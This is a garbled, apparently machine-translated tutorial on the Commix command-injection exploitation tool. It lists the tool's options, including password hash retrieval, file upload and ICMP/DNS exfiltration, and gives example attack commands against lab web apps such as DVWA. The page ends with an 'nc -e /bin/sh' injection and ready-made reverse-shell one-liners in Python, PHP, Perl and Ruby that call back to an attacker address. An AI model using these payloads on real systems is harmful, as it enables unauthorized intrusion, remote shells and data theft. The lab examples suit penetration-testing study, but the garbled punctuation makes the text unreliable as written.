Commix Command Injection exploit

Introduced

Project Address: Https://github.com/stasinopoulos/commix

Commix is a vulnerability testing tool developed using Python, which is designed to facilitate the detection of a request for a command injection vulnerability, test it, and enable direct import of Burp history in the latest version published by its authors to detect, greatly improving ease of use.

Use

Options:    -V Verbose verbosity level (0-1, the default value:0). --version Displays the revision number and exits. --output-dir=. sets the custom output directory path. -s Session_file load a session from a storage (. sqlite) file. --flush-session refreshes the current target's sessions file. --ignore-Session ignores the results stored in the session file. Target:-U Url,--url =URL destination URL. --url-reload reload the destination URL after the command executes. -l LOGFILE resolves the target and data from the HTTP proxy log file. --crawl = crawldepth crawls the site starting from the destination URL (1-2, the default value:0). Request:--data=data string to be sent via post. --host=host HTTP hosts header. --referer=REFERER HTTP REFERER header. --user-agent=Agent HTTP User proxy header. --random-agent using a randomly selected HTTP user-Agent header. --param-del=Pdel Sets the character of the split parameter value. --cookie=Cookie HTTP Cookie header. --cookie-del=CDel Sets the character that splits the cookie value. --headers=HEADERS Extra headers (such as "header1:value1 \ nheader2:value2"). --proxy=proxy uses an HTTP proxy (for example, "127.0.0.1:8080"). --Tor uses the Tor network. --tor-port= ... Set the Tor proxy port (default value:8118). --auth-url=...    Login panel URL. --auth-data =AUTH login parameters and data. --auth-type =AUTH HTTP Authentication type (for example, "Basic" or "digest"). --auth-cred =AUTH HTTP Authentication credentials (for example, "Admin:admin"). --ignore-401 Ignore HTTP Error 401 (not authorized). --force-ssl enforcing the use of SSL/HTTPS.    Enumeration: These options can be used to enumerate the target host. --all retrieves everything. --current-User retrieves the current username. --hostname retrieves the current host name. --is-Root checks whether the current user has root privileges. --is-Admin checks whether the current user has administrator privileges. --sys-info retrieves system information. --users retrieves the system user. --passwords retrieves the system user password hash. --privileges retrieves system user rights. --PS-version retrieves the release number of PowerShell.    File access: These options can be used to access files on the target host. --file-read =FILE:    Reads a file from the target host. --file-Write=FIL.    Writes to a file on the destination host. --file-upload =FI..    Upload files on the target host. --file-dest = FILE: Write and/or the absolute file path of the host being uploaded. Modules: These options can be used to increase detection and/or injection capacity. --icmp-exfil = Ip_.'ICMP exfiltration'injection module. (For example'ip_src = 192.168.178.1,IP_DST = 192.168.178.3'). --dns-server =DNS: "　　DNS exfiltration "injection module.    (the domain name used for DNS filtering attacks). --Shellshock "Shell" injection module.    Injections: These options can be used to specify the parameters to insert and enter, providing a custom injection payload. -p test_parameter can test parameters. --suffix =The SUFFIX injects a payload suffix string. --prefix =PREFIX injects a payload prefix string. --technique =Tech Specifies the injection technique to be used. --maxlen =MaxLen Sets the maximum time-dependent output length, injection technology (default: 10000 characters). --delay =Delay Sets the custom time delay for time-dependent injections (default: 1 seconds). --tmp-path =tmp_p.    Sets the absolute path of the Web server's temp directory. --root-dir=Srv_r.    Sets the absolute path of the Web server root directory. --alter-shell = AL.. Use another Os-shell (for example,'Python'). --os-cmd =Os_cmd executes a single operating system command. --os =The OS forces the back-end operating system to this value. --tamper =TAMPER uses the given script to tamper with the injection data.    Detection: These options are available for customizing the detection phase. --level = level of test to be performed (1-3, the default value:1). --skip-Calc Skips mathematical calculations during detection--dependencies Check for third-party (non-kernel) dependencies. --SKIP-WAF bypasses heuristic detection of waf/ips/ids protection.

Examples of Use

Python commix.py–url= "Http://192.168.1.4/test/test.php?addr=INJECT_HERE" –os-cmd= "nc-e/bin/sh 192.168.1.3 1234 ″

Some usages given by Freebuf (http://www.freebuf.com/sectool/64030.html)

Test vulnerability web App damn

Python commix.py--url="http://192.168.178.58/DVWA-1.0.8/vulnerabilities/exec/#" -- Data="ip=inject_here&submit=submit "--cookie="security=medium; PHPSESSID=NQ30OP434117MO7O2OE5BL7IS4"

Using injection attack payload parameter Test Php-charts 1.0

Python commix.py--url="Http://192.168.178.55/php-charts_v1.0/wizard/index.php?type=INJECT_HERE  " --prefix="//" --suffix="'"

Test owasp with a special header and HTTP proxy Mutillidae

Python commix.py--url="http://192.168.178.46/mutillidae/index.php?popupnotificationcode=sl5& page=dns-lookup.php "--data="target_host=inject_here" --headers="  accept-language:fr\netag:123\n "--proxy="127.0.0.1:8081 "

Test persistence with ICMP leak (exfiltration) technology

su " python commix.py--url= "http://192.168.178.8/debug.php"--data= "addr=127.0.0.1"--icmp-exfil= "ip_src= 192.168.178.5,ip_dst=192.168.178.8 ""

With some rebound shells

1. python-reverse-Shell:python-C ' Import Socket,subprocess,os;s=socket.socket (socket.af_inet,socket. SOCK_STREAM); S.connect (\ "192.168.1.3\”,1234)); Os.dup2 (S.fileno (),0); Os.dup2 (S.fileno (),1); Os.dup2 (S.fileno (),2);p =subprocess.call ([\ "/bin/SH\”,\”-i\ "]); '2. php-reverse-shell:php-R ' \ $sock =fsockopen (\ "192.168.1.3\”,1234); exec (\ "/bin/SH-I. <%263>%263 2>%263\ ");3. perl-reverse-Shell:Perl-E ' use socket;\ $i =\ "192.168.1.3\ "; \ $p =1234Socket (S,pf_inet,sock_stream,getprotobyname (\ "Tcp\"));if(Connect (s,sockaddr_in (\ $p, Inet_aton (\ $i))) {Open (stdin,\ ">%26s\"), open (stdout,\ ">%26s\"), open (stderr,\ ">%26s\"), exec (\ "/bin/SH-i\ ");}; '4. ruby-reverse-Shell:ruby-rsocket-e ' exitifFork;c=tcpsocket.new (\ "192.168.1.3\”,1234); while(cmd=c.gets); Io.popen (cmd,\ "R\") {|io|c.print io.read}end '

Commix Command Injection exploit